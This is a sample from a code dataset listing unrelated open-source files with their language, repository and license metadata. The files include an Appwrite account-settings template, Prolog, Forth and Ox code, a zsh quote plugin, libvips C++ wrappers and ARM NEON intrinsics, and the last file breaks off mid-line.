content
stringlengths
4
1.04M
lang
stringclasses
358 values
score
int64
0
5
repo_name
stringlengths
5
114
repo_path
stringlengths
4
229
repo_licenses
listlengths
1
8
<div class="cover"> <h1 class="zone xl margin-bottom-large"> <a data-ls-attrs="href=/console" class="back text-size-small link-return-animation--start"><i class="icon-left-open"></i> Home</a> <br /> <span>Your Account</span> </h1> </div> <div class="zone xl"> <ul class="phases clear" data-ui-phases data-selected="{{router.params.tab}}"> <li data-state="/console/account"> <h2 class="margin-bottom">Overview</h2> <div data-service="account.get" data-scope="console" data-name="account" data-event="load" data-failure="trigger" data-failure-param-trigger-events="account.deleteSession"> <div class="row responsive force-reverse"> <div class="col span-3 text-align-center margin-bottom"> <img src="" data-ls-attrs="src={{account|avatar}}" data-size="200" height="150" alt="User Avatar" class="avatar huge huge margin-bottom-small" /> </div> <div class="col span-9"> <div class="box margin-bottom-xl"> <div> <form name="account.update" data-analytics data-analytics-activity data-analytics-event="submit" data-analytics-category="console" data-analytics-label="Update Account Name" data-service="account.updateName" data-scope="console" data-event="submit" data-success="trigger,alert" data-success-param-alert-text="Your name was updated successfully" data-success-param-trigger-events="account.update" data-failure="alert" data-failure-param-alert-text="Failed to update your name" data-failure-param-alert-classname="error"> <label for="name">Name</label> <div class="row responsive"> <div class="col span-8 margin-bottom-small"> <input name="name" id="name" type="text" autocomplete="off" data-ls-bind="{{account.name}}" required class="margin-bottom-no" maxlength="128"> </div> <div class="col span-4"> <button type="submit" class="fill margin-bottom-no">Update Name</button> </div> </div> </form> </div> <hr /> <form name="update-email" data-analytics data-analytics-activity data-analytics-event="submit" data-analytics-category="console" data-analytics-label="Update Account Email" data-service="account.updateEmail" data-scope="console" data-event="submit" data-success="trigger,alert" data-success-param-alert-text="Email address updated successfully" data-success-param-trigger-events="account-update,modal-close" data-failure="alert" data-failure-param-alert-text="Failed updating email address" data-failure-param-alert-classname="error"> <label>Email</label> <div class="row responsive"> <div class="col span-8 margin-bottom-small"> <input name="email" type="email" class="margin-bottom-no" autocomplete="off" placeholder="me@example.com" data-ls-bind="{{account.email}}" required> </div> <div class="col span-4"> <div data-ui-modal class="modal box close width-small height-small" data-button-text="Update Email" data-button-class="fill"> <h3>Confirm Password</h3> <hr /> <label>Password</label> <input name="password" type="password" class="full-width" autocomplete="off" placeholder="" required> <hr /> <button type="submit" class="margin-bottom-no">Update</button> &nbsp; <button data-ui-modal-close="" type="button" class="reverse">Cancel</button> </div> </div> </div> </form> <hr /> <div data-ui-modal class="modal box close width-small" data-button-text="Update Password" data-button-class=""> <h1>Update Password</h1> <form name="update-password" data-analytics data-analytics-activity data-analytics-event="submit" data-analytics-category="console" data-analytics-label="Update Account Password" data-service="account.updatePassword" data-scope="console" data-event="submit" data-success="trigger,alert,reset" data-success-param-trigger-events="account-update" data-success-param-alert-text="Password updated successfully" data-failure="alert" data-failure-param-alert-text="Failed updating password" data-failure-param-alert-classname="error"> <label>Current Password</label> <input name="oldPassword" type="password" class="full-width" autocomplete="off" placeholder="" required> <label>New Password</label> <input name="password" type="password" class="full-width" autocomplete="off" placeholder="" required data-forms-password-meter> <hr /> <footer> <button type="submit">Update Password</button> &nbsp; <button data-ui-modal-close="" type="button" class="reverse">Cancel</button> </footer> </form> </div> <hr /> <form class="margin-top" data-analytics data-analytics-activity data-analytics-event="submit" data-analytics-category="console" data-analytics-label="Delete Account Current Session" data-service="account.deleteSession" data-scope="console" data-event="submit" data-success="trigger" data-success-param-trigger-events="account.deleteSession" data-failure="alert" data-failure-param-alert-text="Logout failed" data-failure-param-alert-classname="error"> <input type="hidden" name="sessionId" value="current"> <button class="fill danger icon fill"><i class="icon-login"></i> Logout</button> </form> </div> </div> </div> <div class="row responsive"> <div class="col span-9"> <h3 class="text-danger">Danger Zone</h3> <div class="box danger"> <p>This is the area where you can delete your account.</p> <p>By deleting your account you will lose access to any of your teams and shared data.</p> <p>PLEASE NOTE: Account deletion is irreversible.</p> <form class="inline" data-analytics data-analytics-activity data-analytics-event="submit" data-analytics-category="console" data-analytics-label="Delete Account" data-service="account.delete" data-scope="console" data-event="submit" data-confirm="Are you sure you want to delete your account?" data-success="trigger" data-success-param-trigger-events="account.delete" data-failure="alert" data-failure-param-alert-text="Account deactivation failed" data-failure-param-alert-classname="error"> <button class="danger reverse">Delete Account</button> </form> </div> </div> <div class="col span-3"></div> </div> </div> </li> <li data-state="/console/account/sessions"> <h2>Sessions</h2> <div class="box margin-bottom" data-service="account.getSessions" data-scope="console" data-name="sessions" data-event="load,account.deleteRemoteSession"> <ul data-ls-loop="sessions.sessions" data-ls-as="session" class="list"> <li class="clear"> <span data-ls-if="true != {{session.current}}"> <!-- From remote session (-logout event) --> <form class="pull-end" data-analytics data-analytics-activity data-analytics-event="submit" data-analytics-category="console" data-analytics-label="Delete Account Session" data-service="account.deleteSession" data-scope="console" data-event="submit" data-loading="Loading..." data-success="trigger" data-success-param-trigger-events="account.deleteRemoteSession" data-failure="alert" data-failure-param-alert-text="Logout from Session Failed" data-failure-param-alert-classname="error"> <input type="hidden" name="sessionId" data-ls-bind="{{session.$id}}"> <button class="danger">Logout</button> </form> </span> <span data-ls-if="true == {{session.current}}"> <!-- From current session (+logout event) --> <form class="pull-end" data-analytics data-analytics-activity data-analytics-event="submit" data-analytics-category="console" data-analytics-label="Delete Account Current Session" data-service="account.deleteSession" data-scope="console" data-event="submit" data-loading="Loading..." data-success="trigger,redirect" data-success-param-trigger-events="account.deleteSession" data-success-param-redirect-url="/" data-failure="alert" data-failure-param-alert-text="Logout from Session Failed" data-failure-param-alert-classname="error"> <input type="hidden" name="sessionId" data-ls-bind="{{session.$id}}"> <button class="danger">Logout</button> </form> </span> <div class="pull-start margin-end avatar-container"> <img onerror="this.onerror=null;this.src='/images/unknown.svg'" data-ls-attrs="src={{env.API}}/avatars/browsers/{{session.clientCode|lowercase}}?width=60&height=60&project={{env.PROJECT}},title={{session.clientName}},alt={{session.clientName}}" class="avatar" loading="lazy" width="60" height="60" /> <div data-ls-if="{{session.provider}} !== 'email'" class="corner"> <img data-ls-attrs="src=/images/users/{{session.provider}}.png?buster=<?php echo APP_CACHE_BUSTER; ?>,title={{session.provider}},alt={{session.provider}}" class="avatar xs" loading="lazy" width="30" height="30" /> </div> </div> <span data-ls-if="(!{{log.clientName}})">Unknown</span> <span data-ls-if="({{log.clientName}})" data-ls-bind="{{session.clientName}}"></span> <span data-ls-bind="{{session.clientVersion}}"></span> on <span data-ls-bind="{{session.deviceModel}}"></span> <span data-ls-bind="{{session.osName}}"></span> <span data-ls-bind="{{session.osVersion}}"></span> &nbsp; <span data-ls-if="true == {{session.current}}"> <span class="tag green">Current Session</span> </span> <div class="margin-top-small"> <img onerror="this.onerror=null;this.src='/images/unknown.svg'" data-ls-if="{{session.countryCode}} !== '--'" data-ls-attrs="src={{env.API}}/avatars/flags/{{session.countryCode}}?width=80&height=80&project={{env.PROJECT}}" class="avatar xxs margin-end-small inline" /> <small data-ls-bind="{{session.ip}}"></small> / <small data-ls-bind="{{session.countryName}}"></small> </div> </li> </ul> </div> <form class="inline margin-bottom-large" data-analytics data-analytics-activity data-analytics-event="submit" data-analytics-category="console" data-analytics-label="Delete Account Sessions" data-service="account.deleteSessions" data-scope="console" data-event="submit" data-success="trigger,redirect" data-success-param-trigger-events="account.deleteSession" data-success-param-redirect-url="/" data-failure="alert" data-failure-param-alert-text="Logout from All Sessions Failed" data-failure-param-alert-classname="error"> <input type="hidden" name="id" value="0"> <button class="danger">Logout from all sessions</button> </form> </li> <li data-state="/console/account/activity"> <h2>Activity</h2> <div data-service="account.getLogs" data-scope="console" data-name="securityLogs" data-event="load"> <div class="box"> <table class="vertical small"> <thead> <tr> <th width="140">Date</th> <th width="175">Event</th> <th>Client</th> <th width="90">Location</th> <th width="90">IP</th> </tr> </thead> <tbody data-ls-loop="securityLogs.logs" data-ls-as="log"> <tr> <td data-title="Date: "><span data-ls-bind="{{log.time|dateTime}}"></span></td> <td data-title="Event: "><span data-ls-bind="{{log.event}}"></span></td> <td data-title="Client: "> <img onerror="this.onerror=null;this.src='/images/unknown.svg'" data-ls-attrs="src={{env.API}}/avatars/browsers/{{log.clientCode|lowercase}}?width=80&height=80&project={{env.PROJECT}},title={{log.clientName}},alt={{log.clientName}}" class="avatar xxs inline margin-end-small" /> <span data-ls-if="(!{{log.clientName}})">Unknown</span> <span data-ls-if="({{log.clientName}})" data-ls-bind="{{log.clientName}} {{log.clientVersion}} on {{log.model}} {{log.osName}} {{log.osVersion}}"></span> </td> <td data-title="Location: "> <img onerror="this.onerror=null;this.src='/images/unknown.svg'" data-ls-attrs="src={{env.API}}/avatars/flags/{{log.countryCode}}?width=80&height=80&project={{env.PROJECT}}" class="avatar xxs inline margin-end-small" /> <span data-ls-bind="{{log.geo.countryName}}"></span> </td> <td data-title="IP: "><span data-ls-bind="{{log.ip}}"></span></td> </tr> </tbody> </table> </div> </div> </li> </ul> </div>
HTML+PHP
4
nakshatrasinghh/appwrite
app/views/console/account/index.phtml
[ "BSD-3-Clause" ]
find_undefs :- % check_args(undefs, boolean, true, true), format('UNDEFINED procedure calls:~n===~n',[]), pmodule(M), findall(P, undef_in_m(M,P), Ps), Ps = [_|_], format(' * ~w~n', [M]), member(P, Ps), format(' + ~w:~n',[P]), fail. find_undefs. pmodule(M) :- findall(M, node(M, _,_,_), Ms), sort(Ms, SMs), member(M, SMs). called_in_module(M, P) :- findall(P, edge((_ :- _-M:P)), Ps), sort(Ps, SPs), member(P, SPs). undef_in_m(M,P) :- called_in_module(M, P), \+ edge((_-M:P :- _)), \+ is_private(_, M, P), \+ is_public(_, M, P). /* setof(M, Target^F^Line^NA^undef( ( Target :- F-M:NA ), Line ), Ms ), member( Mod, Ms ), format(' module ~a:~n',[Mod]), setof(NA, Target^F^Line^undef( ( Target :- F-Mod:NA ), Line ), Ns ), member( NA, Ns ), \+ node( Mod , NA , _File1, _ ), \+ node( prolog , NA , _File2, _ ), format(' predicate ~w:~n',[NA]), ( setof(F-Line, Target^undef( ( Target :- F-Mod:NA ), Line ), FLs ), member(F-L, FLs ), format(' line ~w, file ~a~n',[L,F]), fail ; setof(F-M,Type^node( M, NA, F, Type ) , FMs ), format(' same name at:~n',[]), member((F-L)-M, FMs ), format(' module ~a, file ~a, line ~d~n',[M,F,L]), fail ). undefs. */
Prolog
4
ryandesign/yap
utils/analysis/undefs.yap
[ "Artistic-1.0-Perl", "ClArtistic" ]
-include ../tools.mk all: # Work in /tmp, because we need to create the `save-analysis-temp` folder. cp a.rs $(TMPDIR)/ cd $(TMPDIR) && $(RUSTC) -Zsave-analysis $(TMPDIR)/a.rs 2> $(TMPDIR)/stderr.txt || ( cat $(TMPDIR)/stderr.txt && exit 1 ) [ ! -s $(TMPDIR)/stderr.txt ] || ( cat $(TMPDIR)/stderr.txt && exit 1 ) [ -f $(TMPDIR)/save-analysis/liba.json ] || ( ls -la $(TMPDIR) && exit 1 )
Makefile
3
Eric-Arellano/rust
src/test/run-make-fulldeps/issues-41478-43796/Makefile
[ "ECL-2.0", "Apache-2.0", "MIT-0", "MIT" ]
definition module stack :: Stack a newStack :: (Stack a) push :: a (Stack a) -> Stack a pushes :: [a] (Stack a) -> Stack a pop :: (Stack a) -> Stack a popn :: Int (Stack a) -> Stack a top :: (Stack a) -> a topn :: Int (Stack a) -> [a] elements :: (Stack a) -> [a] count :: (Stack a) -> Int
Clean
4
JavascriptID/sourcerer-app
src/test/resources/samples/langs/Clean/stack.dcl
[ "MIT" ]
if ! (( $+commands[curl] )); then echo "rand-quote plugin needs curl to work" >&2 return fi function quote { emulate -L zsh Q=$(curl -s --connect-timeout 2 "http://www.quotationspage.com/random.php" | iconv -c -f ISO-8859-1 -t UTF-8 | grep -m 1 "dt ") TXT=$(echo "$Q" | sed -e 's/<\/dt>.*//g' -e 's/.*html//g' -e 's/^[^a-zA-Z]*//' -e 's/<\/a..*$//g') WHO=$(echo "$Q" | sed -e 's/.*\/quotes\///g' -e 's/<.*//g' -e 's/.*">//g') [[ -n "$WHO" && -n "$TXT" ]] && print -P "%F{3}${WHO}%f: “%F{5}${TXT}%f”" }
Shell
4
chensanle/ohmyzsh
plugins/rand-quote/rand-quote.plugin.zsh
[ "MIT" ]
{:ok, connection} = AMQP.Connection.open {:ok, channel} = AMQP.Channel.open(connection) AMQP.Queue.declare(channel, "hello") AMQP.Basic.publish(channel, "", "hello", "Hello World!") IO.puts " [x] Sent 'Hello World!'" AMQP.Connection.close(connection)
Elixir
3
Diffblue-benchmarks/Rabbitmq-rabbitmq-tutorials
elixir/send.exs
[ "Apache-2.0" ]
# Qt gui animation module SOURCES += animation/qguivariantanimation.cpp
QMake
0
dyzmapl/BumpTop
trunk/win/Source/Includes/QtIncludes/src/gui/animation/animation.pri
[ "Apache-2.0" ]
BTJ
PureBasic
0
pchandrasekaran1595/onnx
onnx/backend/test/data/node/test_nesterov_momentum/test_data_set_0/input_1.pb
[ "Apache-2.0" ]
{define elements} <div class="row" n:foreach="$elements as $element"> <div class="col-md-4"><a href="{$element|elementUrl}" n:class="$element->deprecated ? deprecated, !$element->valid ? invalid">{if $namespace}{$element->shortName}{else}{$element->name}{/if}</a></div> <div class="col-md-8">{$element|shortDescription|noescape}</div> </div> {/define} {if $classes} <h2>Classes summary</h2> <div class="element-list underlined" id="classes"> {include elements, elements => $classes} </div> {/if} {if $interfaces} <h2>Interfaces summary</h2> <div class="element-list underlined" id="interfaces"> {include elements, elements => $interfaces} </div> {/if} {if $traits} <h2>Traits summary</h2> <div class="element-list underlined" id="traits"> {include elements, elements => $traits} </div> {/if} {if $exceptions} <h2>Exceptions summary</h2> <div class="element-list underlined" id="exceptions"> {include elements, elements => $exceptions} </div> {/if} {if $constants} <h2>Constants summary</h2> <div class=" underlined" id="constants"> {include elements, elements => $constants} </div> {/if} {if $functions} <h2>Functions summary</h2> <div class="element-list underlined" id="functions"> {include elements, elements => $functions} </div> {/if}
Latte
3
gitetsu/aws-sdk-php
build/docs/theme/@elementlist.latte
[ "Apache-2.0" ]
: immediate lastxt @ dup c@ negate swap c! ; : \ source nip >in ! ; immediate \ Copyright 2004, 2012 Lars Brinkhoff : char \ ( "word" -- char ) bl-word here 1+ c@ ; : ahead here 0 , ; : resolve here swap ! ; : ' bl-word here find 0branch [ ahead ] exit [ resolve ] 0 ; : postpone-nonimmediate [ ' literal , ' compile, ] literal , ; : create dovariable_code header, reveal ; create postponers ' postpone-nonimmediate , ' abort , ' , , : word \ ( char "<chars>string<char>" -- caddr ) drop bl-word here ; : postpone \ ( C: "word" -- ) bl word find 1+ cells postponers + @ execute ; immediate : unresolved \ ( C: "word" -- orig ) postpone postpone postpone ahead ; immediate : chars \ ( n1 -- n2 ) ; : else \ ( -- ) ( C: orig1 -- orig2 ) unresolved branch swap resolve ; immediate : if \ ( flag -- ) ( C: -- orig ) unresolved 0branch ; immediate : then \ ( -- ) ( C: orig -- ) resolve ; immediate : [char] \ ( "word" -- ) char postpone literal ; immediate : (does>) lastxt @ dodoes_code over >code ! r> swap >does ! ; : does> postpone (does>) ; immediate : begin \ ( -- ) ( C: -- dest ) here ; immediate : while \ ( x -- ) ( C: dest -- orig dest ) unresolved 0branch swap ; immediate : repeat \ ( -- ) ( C: orig dest -- ) postpone branch , resolve ; immediate : until \ ( x -- ) ( C: dest -- ) postpone 0branch , ; immediate : recurse lastxt @ compile, ; immediate : pad \ ( -- addr ) here 1024 + ; : parse \ ( char "string<char>" -- addr n ) pad >r begin source? if <source 2dup <> else 0 0 then while r@ c! r> 1+ >r repeat 2drop pad r> over - ; : ( \ ( "string<paren>" -- ) [ char ) ] literal parse 2drop ; immediate \ TODO: If necessary, refill and keep parsing. : string, ( addr n -- ) here over allot align swap cmove ; : (s") ( -- addr n ) ( R: ret1 -- ret2 ) r> dup @ swap cell+ 2dup + aligned >r swap ; create squote 128 allot : s" ( "string<quote>" -- addr n ) state @ if postpone (s") [char] " parse dup , string, else [char] " parse >r squote r@ cmove squote r> then ; immediate : (abort") ( ... addr n -- ) ( R: ... -- ) cr type cr abort ; : abort" ( ... x "string<quote>" -- ) ( R: ... -- ) postpone if postpone s" postpone (abort") postpone then ; immediate \ ---------------------------------------------------------------------- ( Core words. ) \ TODO: # \ TODO: #> \ TODO: #s : and ( x y -- x&y ) nand invert ; : * 1 2>r 0 swap begin r@ while r> r> swap 2dup dup + 2>r and if swap over + swap then dup + repeat r> r> 2drop drop ; \ TODO: */mod : +loop ( -- ) ( C: nest-sys -- ) postpone (+loop) postpone 0branch , postpone unloop ; immediate : space bl emit ; : ?.- dup 0 < if [char] - emit negate then ; : digit [char] 0 + emit ; : (.) base @ /mod ?dup if recurse then digit ; : ." ( "string<quote>" -- ) postpone s" postpone type ; immediate : . ( x -- ) ?.- (.) space ; : postpone-number ( caddr -- ) 0 0 rot count >number dup 0= if 2drop nip postpone (literal) postpone (literal) postpone , postpone literal postpone , else ." Undefined: " type cr abort then ; ' postpone-number postponers cell+ ! : / ( x y -- x/y ) /mod nip ; : 0< ( n -- flag ) 0 < ; : 1- ( n -- n-1 ) -1 + ; : 2! ( x1 x2 addr -- ) swap over ! cell+ ! ; : 2* ( n -- 2n ) dup + ; \ Kernel: 2/ : 2@ ( addr -- x1 x2 ) dup cell+ @ swap @ ; \ Kernel: 2drop \ Kernel: 2dup \ TODO: 2over ( x1 x2 x3 x4 -- x1 x2 x3 x4 x1 x2 ) \ 3 pick 3 pick ; \ TODO: 2swap \ TODO: <# : abs ( n -- |n| ) dup 0< if negate then ; \ TODO: accept : c, ( n -- ) here c! 1 chars allot ; : char+ ( n1 -- n2 ) 1+ ; : constant create , does> @ ; : decimal ( -- ) 10 base ! ; : depth ( -- n ) data_stack 100 cells + 'SP @ - /cell / 2 - ; : do ( n1 n2 -- ) ( R: -- loop-sys ) ( C: -- do-sys ) postpone 2>r here ; immediate \ TODO: environment? \ TODO: evaluate \ TODO: fill \ TODO: fm/mod ) \ TODO: hold : j ( -- x1 ) ( R: x1 x2 x3 -- x1 x2 x3 ) 'RP @ 3 cells + @ ; \ TODO: leave : loop ( -- ) ( C: nest-sys -- ) postpone 1 postpone (+loop) postpone 0branch , postpone unloop ; immediate : lshift begin ?dup while 1- swap dup + swap repeat ; : rshift 1 begin over while dup + swap 1- swap repeat nip 2>r 0 1 begin r@ while r> r> 2dup swap dup + 2>r and if swap over + swap then dup + repeat r> r> 2drop drop ; : max ( x y -- max[x,y] ) 2dup > if drop else nip then ; \ Kernel: min \ TODO: mod \ TODO: move : (quit) ( R: ... -- ) return_stack 100 cells + 'RP ! 0 'source-id ! tib ''source ! #tib ''#source ! postpone [ begin refill while interpret state @ 0= if ." ok" cr then repeat bye ; ' (quit) ' quit >body cell+ ! \ TODO: s>d \ TODO: sign \ TODO: sm/rem : spaces ( n -- ) 0 do space loop ; \ TODO: u. : signbit ( -- n ) -1 1 rshift invert ; : xor ( x y -- x^y ) 2dup nand >r r@ nand swap r> nand nand ; : u< ( x y -- flag ) signbit xor swap signbit xor > ; \ TODO: um/mod : variable ( "word" -- ) create /cell allot ; : ['] \ ( C: "word" -- ) ' postpone literal ; immediate
Forth
4
JavascriptID/sourcerer-app
src/test/resources/samples/langs/Forth/core.fth
[ "MIT" ]
* Level Restorer .subckt levr in out Vdd Gnd X0 in out Vdd Gnd inv nsize=2 psize=1 X11 in out Vdd Vdd pfetz wsize=1 lsize=2 .ends
SourcePawn
2
HackerFoo/vtr-verilog-to-routing
vtr_flow/scripts/spice/subckt/level_restorer.sp
[ "MIT" ]
FROM node:12-buster RUN apt-get update RUN apt-get install -y jq RUN apt-get install -y uuid-runtime COPY entrypoint.sh /entrypoint.sh ENTRYPOINT ["/entrypoint.sh"]
Dockerfile
3
symbldk/shields
.github/actions/draft-release/Dockerfile
[ "CC0-1.0" ]
#include <oxstd.h> #include <oxdraw.h> #include <oxprob.h> #include <maximize.h> #import <modelbase> #import <simula> #include <oxfloat.h> static decl iB; //Repeats static decl iSIZE; //Size of time series static decl iSTEPS; //#Steps to divide the size static decl iSIMS; //# of Zt ~ N(0,1) static decl iPLOT; static decl iDIST; static decl dALPHA; static decl dBETA; static decl dOMEGA; static decl dGAMMA; static decl iPARS; //number of parameters static decl vSTD_ALD; // Zt ~ ALD(0, 1, p) static decl vSTD_AST; // Zt ~ AST(0, 1, ,nu, p) static decl vRANT; // Zt ~ ALD(0, b, p) static decl s_vY; //Simulated returns //static decl bSTD_ERROR; //0 or 1 boalean findicator(const vX){ decl vReturn, iN; iN = sizerc(vX); if(rows(vX)!=1){ vReturn = zeros(iN,1); }else{ vReturn = zeros(1,iN); } // print(vReturn); for(decl i=0;i<iN;i++){ if(vX[i]<=0){ vReturn[i]=1; } } return vReturn; } fSign(const vX){ decl vReturn, iN; iN = sizerc(vX); if(rows(vX)!=1){ vReturn = ones(iN,1); }else{ vReturn = ones(1,iN); } // print(vReturn); for(decl i=0;i<iN;i++){ if(vX[i]<=0){ vReturn[i]=-1; } if(vX[i]==0){ vReturn[i]=0; } } return vReturn; } fK(const dLambda){ decl dK; if(dLambda>320){ return 1/sqrt(2*M_PI); //too large calculation this is the limit } dK = gammafact((dLambda+1)/2)/(gammafact(dLambda/2)*sqrt(dLambda*M_PI)); return dK; } fSimALGAS(const dAlpha, const dBeta, const dOmega, const dGamma, const dP, const avReturns){ decl vTemp, vH; vTemp = vH = zeros(iSIZE+1, 1); vH[0]= dGamma; //by definition for(decl i = 0; i < iSIZE; i++){ vTemp[i] = sqrt(vH[i])*vSTD_ALD[i]; vH[i+1] = dOmega + dBeta*vH[i] + dAlpha*((dP-findicator(vTemp[i]))*(2*sqrt(1-2*dP+2*sqr(dP))/((1-dP)*dP))*vTemp[i]*sqrt(vH[i])-2*vH[i]) ; } vTemp = dropr(vTemp,iSIZE); vH = dropr(vH,iSIZE); avReturns[0] = vH; return 1; } fSimASTGAS(const dAlpha, const dBeta, const dOmega, const dGamma, const dLambda, const dP, const avReturns){ decl vTemp, vH; vTemp = vH = zeros(iSIZE+1, 1); vH[0]= dGamma; //by definition for(decl i = 0; i < iSIZE; i++){ vTemp[i] = sqrt(vH[i])*vSTD_AST[i]; vH[i+1] = dOmega + dAlpha*(dLambda+3)/dLambda*((dLambda+1)*sqrt( 4*((dP^3+(1-dP)^3)*(dLambda/(dLambda-2)))-16*fK(dLambda)^2*((1-2*dP)*(dLambda/(dLambda-1)))^2 )/((dP-findicator(-vTemp[i]))^2*(4*dLambda))*(1+( 4*((dP^3+(1-dP)^3)*(dLambda/(dLambda-2)))-16*fK(dLambda)^2*((1-2*dP)*(dLambda/(dLambda-1)))^2 )*sqr(vTemp[i])/(((dP-findicator(-vTemp[i]))^2*(4*dLambda))*vH[i]))^(-1)*sqr(vTemp[i])-vH[i]) + dBeta*vH[i]; } //sqr(p-findicator(-vNews)) vTemp = dropr(vTemp,iSIZE); vH = dropr(vH,iSIZE); avReturns[0] = vH; return 1; } main() { // decl vRanExp, vRanExp2, vRanBern, vRanALD, vRanN; // decl dB; //dB > 0 // decl dP; //0 < dP < 1 // // dB = 1; // dP = 0.3; // iDIST = 10000000; // iSIZE = 1000; // iPLOT = 1000; // vRanExp = ranexp(iDIST, 1, 1); // vRanExp2 = ranexp(iDIST, 1, 1); //// vRanBern = ranbinomial(iDIST, 1, 1, dP); // vRanALD = vRanExp/dP-vRanExp2/(1-dP); //~ALD(0,1,p) // vRanALD = dB*vRanALD; //~ALD(0,b,p) // // vSTD_ALD = (1-dP)*dP/(dB*sqrt(1-2*dP+2*sqr(dP)))*vRanALD; // print(variance(vSTD_ALD)); // vRanN = rann(iDIST,1); decl vRant1, vRant2, vRanu, vRanAST, vRann; iDIST = 10000000; iSIZE = 1000; iPLOT = 1000; decl dLambda; // V>0 (or V>2) to ensure variance!!!) decl dP; // 0<alpha<1 dLambda = 1000000; dP = 0.5; decl dOmega, dAlpha, dBeta, dGamma; dAlpha = .1; dBeta = 1; dOmega = 0.01; dGamma = 0.1; vRanu = ranu(iDIST, 1); vRann = rann(iDIST,1); vRant1 = rant(iDIST, 1, dLambda); vRant2 = rant(iDIST,1, dLambda); //print(vRant2[0:iPLOT]); vRanAST = dP* fabs(vRant1).*(fSign(vRanu-dP)-1) + (1-dP)*fabs(vRant2).*(fSign(vRanu-dP)+1) ; //print(vRanAST[0:iPLOT]); //print(fK(dLambda)^2); vSTD_AST = vRanAST/sqrt( 4*((dP^3+(1-dP)^3)*(dLambda/(dLambda-2)))-16*fK(dLambda)^2*((1-2*dP)*(dLambda/(dLambda-1)))^2 ); //print(vSTD_AST[0:iPLOT]); //hier kan hij niet verder dan 300 //print(variance(vSTD_AST)); decl vReturns; //fSimALGAS(0.1, 0.99, 0.01, 0.1, 0.45, &vReturns); //print(vReturns); fSimASTGAS(dAlpha, dBeta, dOmega, dGamma, dLambda, dP, &vReturns); SetDrawWindow("0_SIM_asymmetric_student's_t-GAS"); DrawDensity(0, (vRann)', {"Density zt~ N(0,1)"}); DrawDensity(0, (vSTD_AST)', {"Density zt~AST(0,p,nu,1)"}); Draw(1, (vSTD_AST[0:iPLOT])'); Draw(2, (vReturns)'); ShowDrawWindow(); //print(vRanALD); }
Ox
3
tamerdilaver/Simulation
simulate_ast.ox
[ "MIT" ]
/* Object part of the VSource and VTarget class */ /* Copyright (C) 1991-2001 The National Gallery This program is free software; you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details. You should have received a copy of the GNU Lesser General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA */ /* These files are distributed with VIPS - http://www.vips.ecs.soton.ac.uk */ #ifdef HAVE_CONFIG_H #include <config.h> #endif /*HAVE_CONFIG_H*/ #include <vips/intl.h> #include <vips/vips8> #include <vips/debug.h> /* #define VIPS_DEBUG #define VIPS_DEBUG_VERBOSE */ VIPS_NAMESPACE_START VSource VSource::new_from_descriptor( int descriptor ) { VipsSource *input; if( !(input = vips_source_new_from_descriptor( descriptor )) ) throw VError(); VSource out( input ); return( out ); } VSource VSource::new_from_file( const char *filename ) { VipsSource *input; if( !(input = vips_source_new_from_file( filename )) ) throw VError(); VSource out( input ); return( out ); } VSource VSource::new_from_blob( VipsBlob *blob ) { VipsSource *input; if( !(input = vips_source_new_from_blob( blob )) ) throw VError(); VSource out( input ); return( out ); } VSource VSource::new_from_memory( const void *data, size_t size ) { VipsSource *input; if( !(input = vips_source_new_from_memory( data, size )) ) throw VError(); VSource out( input ); return( out ); } VSource VSource::new_from_options( const char *options ) { VipsSource *input; if( !(input = vips_source_new_from_options( options )) ) throw VError(); VSource out( input ); return( out ); } VTarget VTarget::new_to_descriptor( int descriptor ) { VipsTarget *output; if( !(output = vips_target_new_to_descriptor( descriptor )) ) throw VError(); VTarget out( output ); return( out ); } VTarget VTarget::new_to_file( const char *filename ) { VipsTarget *output; if( !(output = vips_target_new_to_file( filename )) ) throw VError(); VTarget out( output ); return( out ); } VTarget VTarget::new_to_memory() { VipsTarget *output; if( !(output = vips_target_new_to_memory()) ) throw VError(); VTarget out( output ); return( out ); } VIPS_NAMESPACE_END
C++
4
PrimenST/primenmd
node_modules/sharp/src/libvips/cplusplus/VConnection.cpp
[ "MIT" ]
{ "@context": "http://www.w3.org/ns/anno.jsonld", "id": "/annotations/anno2.jsonld", "type": "Annotation", "created": "2015-02-31T12:03:45Z", "body": { "type": "TextualBody", "value": "Great resource!" }, "target": "http://www.w3c.org/" }
JSONLD
2
ziransun/wpt
annotation-protocol/files/annotations/anno2.jsonld
[ "BSD-3-Clause" ]
/* Workaround for missing vld1_*_x2 and vst1_*_x2 intrinsics in gcc-7. */ __extension__ extern __inline uint8x8x2_t __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vld1_u8_x2 (const uint8_t *__a) { uint8x8x2_t ret; asm volatile("ld1 {%S0.8b - %T0.8b}, %1" : "=w" (ret) : "Q"(*__a)); return ret; } __extension__ extern __inline int8x8x2_t __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vld1_s8_x2 (const int8_t *__a) { int8x8x2_t ret; asm volatile("ld1 {%S0.8b - %T0.8b}, %1" : "=w" (ret) : "Q"(*__a)); return ret; } __extension__ extern __inline uint16x4x2_t __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vld1_u16_x2 (const uint16_t *__a) { uint16x4x2_t ret; asm volatile("ld1 {%S0.4h - %T0.4h}, %1" : "=w" (ret) : "Q"(*__a)); return ret; } __extension__ extern __inline int16x4x2_t __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vld1_s16_x2 (const int16_t *__a) { int16x4x2_t ret; asm volatile("ld1 {%S0.4h - %T0.4h}, %1" : "=w" (ret) : "Q"(*__a)); return ret; } __extension__ extern __inline uint32x2x2_t __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vld1_u32_x2 (const uint32_t *__a) { uint32x2x2_t ret; asm volatile("ld1 {%S0.2s - %T0.2s}, %1" : "=w" (ret) : "Q"(*__a)); return ret; } __extension__ extern __inline int32x2x2_t __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vld1_s32_x2 (const int32_t *__a) { int32x2x2_t ret; asm volatile("ld1 {%S0.2s - %T0.2s}, %1" : "=w" (ret) : "Q"(*__a)); return ret; } __extension__ extern __inline uint64x1x2_t __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vld1_u64_x2 (const uint64_t *__a) { uint64x1x2_t ret; asm volatile("ld1 {%S0.1d - %T0.1d}, %1" : 